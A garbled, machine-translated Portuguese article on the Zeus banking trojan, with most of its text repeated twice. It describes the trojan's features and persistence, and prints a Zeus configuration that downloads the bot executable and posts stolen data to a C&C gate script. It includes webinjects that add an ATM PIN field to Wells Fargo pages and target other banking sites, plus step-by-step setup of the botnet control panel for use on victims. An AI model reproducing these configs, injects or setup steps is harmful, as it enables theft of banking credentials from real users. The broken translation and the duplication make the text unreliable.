Tweet
Zeus, também conhecido como Zbot / WSNPoem, é famoso por roubar informações bancárias usando "man in the browser keystroke logging" e "form grabbing". Como o termo sugere, o homem no browser (MITB) é, basicamente, um cavalo de Tróia do proxy que usa homem em técnicas média para os usuários de ataque. Ele ataca através da exploração de vulnerabilidades na segurança do navegador para modificar páginas da web e manipular transações monetárias mudando ou adicionando detalhes que são mal-intencionado. A pior parte é que nenhuma forma de um nível de aplicação ou sessões de segurança da camada de SSL pode proteger uma tal forma de ataque. A melhor maneira para proteger contra a estes é out-of-band verificação transação. Form grabbing é uma técnica de de capturar dados do formulário da correia fotorreceptora em vários browsers. Muito recentemente Hacker feliz foi preso; ele foi alegado de usar o mastermind por trás de o cavalo de Tróia banking Zeus. Zeus vem como um kit de ferramentas para construir e administrar um botnet. Ele tem uma painel de controle que é usado para monitorar e atualizar patches para o botnet. Ele também tem um so-called ferramenta de construtor de que permite que os a criação de executáveis que são usados para infectar as computadores de usuários.
Features de Zeus
Alguns dos características que este botnet exibe são:
Captura credenciais de mais de HTTP, HTTPS, FTP, POP3
Roubadas de bola do lado do cliente certificados X.509 de infra-estrutura de chaves públicas
Tem uma SOCKS do proxy integrado
Roubos de bola / exclusões HTTP e flash cookies
Captura imagens de écran e scrapes HTML a partir de sites-alvo
Modifica o arquivo de hosts local
Groups os Usuário dos Sistemas de infectados em diferentes botnets comando e controle para distribuir
Tem capacidades de de busca que podem ser utilizados através de um formulário web
O arquivo de configuração é encriptada
Has um importante função para matá-o sistema operacional
De comando e de servidor de controle de Contatos para tarefas adicionais para executar
Tem uma string exclusiva identificação bot
Envia uma monte de informações para servidor de C & C, tais como a versão do bot, sistema operacional, o tempo de local, localizações geográficas, etc
De Configuração de Zeus
Zeus um arquivo de configuração, geralmente com uma extensão de arquivo tais como bin;. Ele tem um arquivo binário que contém o cavalo de Tróia Zeus e uma zona para soltar que é na maior parte um arquivo de PHP. O kit de ferramentas (Zeus Crimeware Toolkit) vem com um painel de controle construído up on PHP que é usado para o monitoramento o botnet e o informações coletadas são armazenadas em um banco de dados MySQL. Daí, uma vez que todas as bots são implantados, estes podem ser monitorado e gerenciado por painel de controle.
Aqui estão algumas localizações foram os vários módulos de Zeus podem ser encontrados:
Uma vez que o bot é executado, ele copia a si mesmo para os locais de mencionados acima com description "binary Trojan." To desovar esse processo todos os tempo on startup, ele define o path binary cavalo de Tróia para
HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows NT \ winlogon \ userinit. Ele infecta winlogon.exe e svchost.exe e adiciona código malicioso a eles. Como mostrado acima, o arquivo de local.ds/sysproc86.sys/audio.dll contém os dados de roubados a partir de o usuário em a forma de as credenciais do usuário, informações financeiras para os bancos, etc O código de mal-intencionado que obtém adicionado ao svchost.exe é responsável para comunicações de rede e outros injeções de em vários processos.
Definições de Configuração de Zeus
Aqui está o arquivo de configuração de Zeus:
Existem dois tipos de de configuração disponível com o Bot Zeus:
De Configuração-This estática é compilada por o próprio ferramenta de construtor de e contém as instruções de execução de first-de tempo para o bot. By default, ele é definido para roubar senhas, informações financeiras, de site e de bate-papo os logs, etc Nós temos um URL importante sob url_config que é usado durante a fase de a inicialização de o bot. The de configuração estática é codificado em o executável bot e também contém configurações, tais como nome botnet, opções de temporização para uploads / downloads, e o URL para baixar o arquivo de configuração.
De Configuração-It Dinâmico se concentra principalmente on URL-alvo e a técnica de-alvo. The configuração dinâmica envolve a downloader automático, as injeções de página web, etc The webinjects arquivo é o arquivo principal envolvido em a configuração dinâmica Zeus. The configuração dinâmica também tem um URL fazer download do novo / backup executável e arquivo de configuração. Ele também tem configurações para injeções de tempo de execução para alguns dos parâmetros HTTP,, bem como filtros para logs específicos. Ele também tem URLs para coletar números de autenticação de transação utilizadas pelos bancos para a autenticação de online. Há é uma de configuração avançado,, bem como, que podem ser usado para injetar campos adicionais em páginas da web bancários para extrair obter mais informações a partir de a vítima.
Um poucos de os comandos de encontram-se pormenorizados abaixo:
url_server-C & location servidor de C
localização url_loader-update para o bot
Webfilters-Estes são filtros com padrões de de assinatura; quaisquer dados enviados para estes URLs está marcada para assinaturas específicas como nome de usuário, número de conta, password, etc Este importantes de dados é capturado e enviadas para os servidores C & C.
AdvancedConfigs-URL para arquivos de de configuração atualizados
DNSMap-To manipular o arquivo de hosts para parar o acesso a sites de segurança e para URL o redirecionamento de para sites falsos.
Os arquivos de configuração estão escondidas e também criptografada com RC4 cipher. Cada tecla RC4 é específico para um bot e é armazenado dentro de o executável criptografada.
Injeções de Webpage
Como mencionado acima, Zeus tem a capacidade para injetar dinamicamente em campos do formulário em as páginas da web relativos a um sistema infected. The de dados é interceptado entre as comunicações cliente-de servidor e de, em seguida, manipulado. Aqui está uma snippet código com da injecção:
Descrição dos parâmetros:
Set_url - A página de o qual tem para ser atacado
data_before - dados a procurar antes da injeção
data_inject - Dados que irá ser injetadas
A capacidade de de Zeus para tirar screenshots ativos bate o de uso de recursos de teclados virtuais em transações on-line. Os screenshots de desktop são cronometrados como per experiência do usuário de de entrar senhas usando teclado virtual. Reports por FortiGuard demonstrar uma de captura de exata do o ser de entrada de senha pela vítima.
Aqui está uma pequena parte de o default webinjects arquivo em Zeus:
Techniques Harvesting de dados usadas pelo o Bot
As funções de Zbot por download de um arquivo de configuração criptografados e armazenando-o em a localização marcado acima. O cavalo de Tróia abre up uma conexão de backdoor para o download / upload a partir do servidor comando e controle, tais como versões mais recentes do arquivo de configuração, empurrando os dados roubados para um local específico como em o arquivo de configuração, etc Então, agora uma vez que o bot começa a funcionar, qualquer forma de credenciais de ou informações banking é interceptado por-lo e carregado para o a localização secreta. Ele usa mecanismos avançados para o formulário agarrando que define up páginas da web e o usuário unknowingly entra em seu de informação financeira, que é novamente capturado por o bot. Zeus também é conhecido para roubar dados a partir de o de armazenamento do Windows protegida, certificados digitais, e screenshots ativos de o computador da vítima.
Instalação de Zeus
NOTA: Este procedimento todo mostrado é de apenas para fins educacionais e o autor não será responsável por qualquer dano causado por alguém que usa esta ferramenta.
Então, vamos começar através da criação up uma conta em um web de hospedagem e criando um banco de dados Mysql, username e senha. , Em seguida, nós nos movemos on para o arquivo de index.php sob o caminho de / install / index.php . Nós fazemos os menores mudanças na o código para fornecer informações, tais como o nome de usuário e uma senha para Zeus, mysql de host, username e senha, e uma chave cripta botnet. Aqui está uma captura de tela mostrando o mesmo:
Em seguida nós mover-se para o arquivo de global.php sob o caminho de /system/global.php. Novamente nós colocar em os mesmos detalhes como acima, que também são mostrados no diagrama.
Agora que que tudo estiver definido up, nós podemos executar o nosso arquivo de index.php sob a path /install/index.php. Isso abre up um menu de instalação e nós simplesmente colocar em as credenciais.
Após este nós pode simplesmente abrir up o arquivo de cp.php no diretório de para casa para ter o botnet up e funcionando. Agora nós pode definir up o bot on os sistemas de vítima tão bem.
Aqui estão os tabelas do MySQL que têm sido de configuração por o Installation bot Zeus.
botnet_ reports Contém a lista de relatórios de de botnets
ipv4toc-Contém o endereço IP para mapeamentos de país
De Trabalho da Bot Zeus
Uma vez que os os clientes estão infectado, eles se comunicam com o servidor de de comando por meio HTTP GET mensagens. Isto é, principalmente, necessário para baixar o arquivo de configuração de o botnet on o sistema de vítima e em seguida, executar ações como per as configurações do o arquivo de configuração. Uma vez que o bot comunica com o servidor de comando, ele responde de volta com o arquivo de configurações criptografado,, principalmente, config.bin. Este arquivo criptografado é descriptografado no final cliente pelo bot (usando a sua chave secreta), o qual, em seguida, analisa o arquivo de de configuração. Uma vez que o arquivo de configuração é setup, o bot envia a sua endereço de IP gateway (endereço de IP public) para o servidor de de comando. Uma vez que o comunicação está definido up e o bot se junta a up o botnet, ele começa postagem up informações privadas da vítima on o endereço atribuído a partir de o arquivo de configuração. Então, tudo a informação financeira, as credenciais de, e screenshots ficar carregado para esse endereço segredo para que eles possam, então, ser utilizado de forma maliciosa por o pessoa que está executando o botnet.
Features de Zeus
Alguns dos características que este botnet exibe são:
Captura credenciais de mais de HTTP, HTTPS, FTP, POP3
Roubadas de bola do lado do cliente certificados X.509 de infra-estrutura de chaves públicas
Tem uma SOCKS do proxy integrado
Roubos de bola / exclusões HTTP e flash cookies
Captura imagens de écran e scrapes HTML a partir de sites-alvo
Modifica o arquivo de hosts local
Groups os Usuário dos Sistemas de infectados em diferentes botnets comando e controle para distribuir
Tem capacidades de de busca que podem ser utilizados através de um formulário web
O arquivo de configuração é encriptada
Has um importante função para matá-o sistema operacional
De comando e de servidor de controle de Contatos para tarefas adicionais para executar
Tem uma string exclusiva identificação bot
Envia uma monte de informações para servidor de C & C, tais como a versão do bot, sistema operacional, o tempo de local, localizações geográficas, etc
De Configuração de Zeus
Zeus um arquivo de configuração, geralmente com uma extensão de arquivo tais como bin;. Ele tem um arquivo binário que contém o cavalo de Tróia Zeus e uma zona para soltar que é na maior parte um arquivo de PHP. O kit de ferramentas (Zeus Crimeware Toolkit) vem com um painel de controle construído up on PHP que é usado para o monitoramento o botnet e o informações coletadas são armazenadas em um banco de dados MySQL. Daí, uma vez que todas as bots são implantados, estes podem ser monitorado e gerenciado por painel de controle.
Aqui estão algumas localizações foram os vários módulos de Zeus podem ser encontrados:
Código:
Arquivo Descrição C:\WINDOWS\system32\ntos.exe Trojan binary C:\WINDOWS\system32\wsnpoem\audio.dll Contains the stolen data C:\WINDOWS\system32\wsnpoem\video.dll Contains the encrypted config C:\WINDOWS\system32\oembios.exe Trojan binary C:\WINDOWS\system32\sysproc64\sysproc86.sys Contains the stolen data C:\WINDOWS\system32\sysproc64\sysproc32.sys Contains the encrypted config C:\WINDOWS\system32\twext.exe Trojan binary C:\WINDOWS\system32\twain_32\local.ds Contains the stolen data C:\WINDOWS\system32\twain_32\user.ds Contains the encrypted config C:\WINDOWS\system32\sdra64.exe Trojan binary C:\WINDOWS\system32\lowsec\local.ds Contains the stolen data C:\WINDOWS\system32\lowsec\user.ds Contains the encrypted config
HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows NT \ winlogon \ userinit. Ele infecta winlogon.exe e svchost.exe e adiciona código malicioso a eles. Como mostrado acima, o arquivo de local.ds/sysproc86.sys/audio.dll contém os dados de roubados a partir de o usuário em a forma de as credenciais do usuário, informações financeiras para os bancos, etc O código de mal-intencionado que obtém adicionado ao svchost.exe é responsável para comunicações de rede e outros injeções de em vários processos.
Definições de Configuração de Zeus
Aqui está o arquivo de configuração de Zeus:
Código:
;Build time: 11:35:57 24.03.2011 GMT
;Version: 2.1.0.1
entry "StaticConfig"
;botnet "btn1"
timer_config 60 1
timer_logs 1 1
timer_stats 20 1
url_config "http://localhost/config.bin"
remove_certs 1
disable_tcpserver 0
encryption_key "password"
end
entry "DynamicConfig"
url_loader "http://localhost/botnet.exe"
url_server "http://localhost/gate.php"
file_webinjects "webinjects.txt"
entry "AdvancedConfigs"
;"http://advdomain/cfg1.bin"
end
entry "WebFilters"
"!*.microsoft.com/*"
"!http://*myspace.com*"
"https://www.gruposantander.es/*"
"!http://*odnoklassniki.ru/*"
"!http://vkontakte.ru/*"
"@*/login.osmp.ru/*"
"@*/atl.osmp.ru/*"
end
entry "WebDataFilters"
;"http://mail.rambler.ru/*" "passw;login"
end
entry "WebFakes"
;"http://www.google.com" "http://www.yahoo.com" "GP" "" ""
end
end
De Configuração-This estática é compilada por o próprio ferramenta de construtor de e contém as instruções de execução de first-de tempo para o bot. By default, ele é definido para roubar senhas, informações financeiras, de site e de bate-papo os logs, etc Nós temos um URL importante sob url_config que é usado durante a fase de a inicialização de o bot. The de configuração estática é codificado em o executável bot e também contém configurações, tais como nome botnet, opções de temporização para uploads / downloads, e o URL para baixar o arquivo de configuração.
De Configuração-It Dinâmico se concentra principalmente on URL-alvo e a técnica de-alvo. The configuração dinâmica envolve a downloader automático, as injeções de página web, etc The webinjects arquivo é o arquivo principal envolvido em a configuração dinâmica Zeus. The configuração dinâmica também tem um URL fazer download do novo / backup executável e arquivo de configuração. Ele também tem configurações para injeções de tempo de execução para alguns dos parâmetros HTTP,, bem como filtros para logs específicos. Ele também tem URLs para coletar números de autenticação de transação utilizadas pelos bancos para a autenticação de online. Há é uma de configuração avançado,, bem como, que podem ser usado para injetar campos adicionais em páginas da web bancários para extrair obter mais informações a partir de a vítima.
Um poucos de os comandos de encontram-se pormenorizados abaixo:
url_server-C & location servidor de C
localização url_loader-update para o bot
Webfilters-Estes são filtros com padrões de de assinatura; quaisquer dados enviados para estes URLs está marcada para assinaturas específicas como nome de usuário, número de conta, password, etc Este importantes de dados é capturado e enviadas para os servidores C & C.
AdvancedConfigs-URL para arquivos de de configuração atualizados
DNSMap-To manipular o arquivo de hosts para parar o acesso a sites de segurança e para URL o redirecionamento de para sites falsos.
Os arquivos de configuração estão escondidas e também criptografada com RC4 cipher. Cada tecla RC4 é específico para um bot e é armazenado dentro de o executável criptografada.
Injeções de Webpage
Como mencionado acima, Zeus tem a capacidade para injetar dinamicamente em campos do formulário em as páginas da web relativos a um sistema infected. The de dados é interceptado entre as comunicações cliente-de servidor e de, em seguida, manipulado. Aqui está uma snippet código com da injecção:
Código:
type = "text" name = "pinnumber" id = "pinnumber" /> </ td> </ tr> data_end data_after data_end
Descrição dos parâmetros:
Set_url - A página de o qual tem para ser atacado
data_before - dados a procurar antes da injeção
data_inject - Dados que irá ser injetadas
A capacidade de de Zeus para tirar screenshots ativos bate o de uso de recursos de teclados virtuais em transações on-line. Os screenshots de desktop são cronometrados como per experiência do usuário de de entrar senhas usando teclado virtual. Reports por FortiGuard demonstrar uma de captura de exata do o ser de entrada de senha pela vítima.
Aqui está uma pequena parte de o default webinjects arquivo em Zeus:
Código:
set_url */my.ebay.com/*CurrentPage=MyeBayPersonalInfo* GL data_before Registered email address *<img*> data_end data_inject e-mail: data_end data_after data_end set_url *.ebay.com/*eBayISAPI.dll?* GL data_before (<a href="http://feedback.ebay.com/ws/eBayISAPI.dll?ViewFeedback&*"> data_end data_inject Feedback: data_end data_after </a> data_end set_url https://www.us.hsbc.com/* GL data_before</pre> data_enddata_injectdata_enddata_after <pre> data_end set_url https://www.e-gold.com/acct/li.asp GPL data_before e-mail: data_end data_inject data_end data_after data_end set_url https://www.e-gold.com/acct/balance.asp* GPL data_before</pre> <form name="fiat*</form"> data_end data_inject data_end data_after data_end set_url https://online.wellsfargo.com/das/cgi-bin/session.cgi* GL data_before <div class="noprint" id="pageIntro">data_end data_inject data_end data_after data_end set_url https://www.wellsfargo.com/* G data_before <span class="mozcloak"><input type="password" /> data_end data_inject <strong><label for="atmpin">ATM PIN</label>:</strong> <span class="mozcloak"><input accesskey="A" id="atmpin" style="width: 147px;" tabindex="2" type="password" maxlength="14" name="USpass" size="13" /></span> data_end data_after data_end
As funções de Zbot por download de um arquivo de configuração criptografados e armazenando-o em a localização marcado acima. O cavalo de Tróia abre up uma conexão de backdoor para o download / upload a partir do servidor comando e controle, tais como versões mais recentes do arquivo de configuração, empurrando os dados roubados para um local específico como em o arquivo de configuração, etc Então, agora uma vez que o bot começa a funcionar, qualquer forma de credenciais de ou informações banking é interceptado por-lo e carregado para o a localização secreta. Ele usa mecanismos avançados para o formulário agarrando que define up páginas da web e o usuário unknowingly entra em seu de informação financeira, que é novamente capturado por o bot. Zeus também é conhecido para roubar dados a partir de o de armazenamento do Windows protegida, certificados digitais, e screenshots ativos de o computador da vítima.
Instalação de Zeus
NOTA: Este procedimento todo mostrado é de apenas para fins educacionais e o autor não será responsável por qualquer dano causado por alguém que usa esta ferramenta.
Então, vamos começar através da criação up uma conta em um web de hospedagem e criando um banco de dados Mysql, username e senha. , Em seguida, nós nos movemos on para o arquivo de index.php sob o caminho de / install / index.php . Nós fazemos os menores mudanças na o código para fornecer informações, tais como o nome de usuário e uma senha para Zeus, mysql de host, username e senha, e uma chave cripta botnet. Aqui está uma captura de tela mostrando o mesmo:
Em seguida nós mover-se para o arquivo de global.php sob o caminho de /system/global.php. Novamente nós colocar em os mesmos detalhes como acima, que também são mostrados no diagrama.
Agora que que tudo estiver definido up, nós podemos executar o nosso arquivo de index.php sob a path /install/index.php. Isso abre up um menu de instalação e nós simplesmente colocar em as credenciais.
Após este nós pode simplesmente abrir up o arquivo de cp.php no diretório de para casa para ter o botnet up e funcionando. Agora nós pode definir up o bot on os sistemas de vítima tão bem.
Aqui estão os tabelas do MySQL que têm sido de configuração por o Installation bot Zeus.
botnet_ reports Contém a lista de relatórios de de botnets
ipv4toc-Contém o endereço IP para mapeamentos de país
De Trabalho da Bot Zeus
Uma vez que os os clientes estão infectado, eles se comunicam com o servidor de de comando por meio HTTP GET mensagens. Isto é, principalmente, necessário para baixar o arquivo de configuração de o botnet on o sistema de vítima e em seguida, executar ações como per as configurações do o arquivo de configuração. Uma vez que o bot comunica com o servidor de comando, ele responde de volta com o arquivo de configurações criptografado,, principalmente, config.bin. Este arquivo criptografado é descriptografado no final cliente pelo bot (usando a sua chave secreta), o qual, em seguida, analisa o arquivo de de configuração. Uma vez que o arquivo de configuração é setup, o bot envia a sua endereço de IP gateway (endereço de IP public) para o servidor de de comando. Uma vez que o comunicação está definido up e o bot se junta a up o botnet, ele começa postagem up informações privadas da vítima on o endereço atribuído a partir de o arquivo de configuração. Então, tudo a informação financeira, as credenciais de, e screenshots ficar carregado para esse endereço segredo para que eles possam, então, ser utilizado de forma maliciosa por o pessoa que está executando o botnet.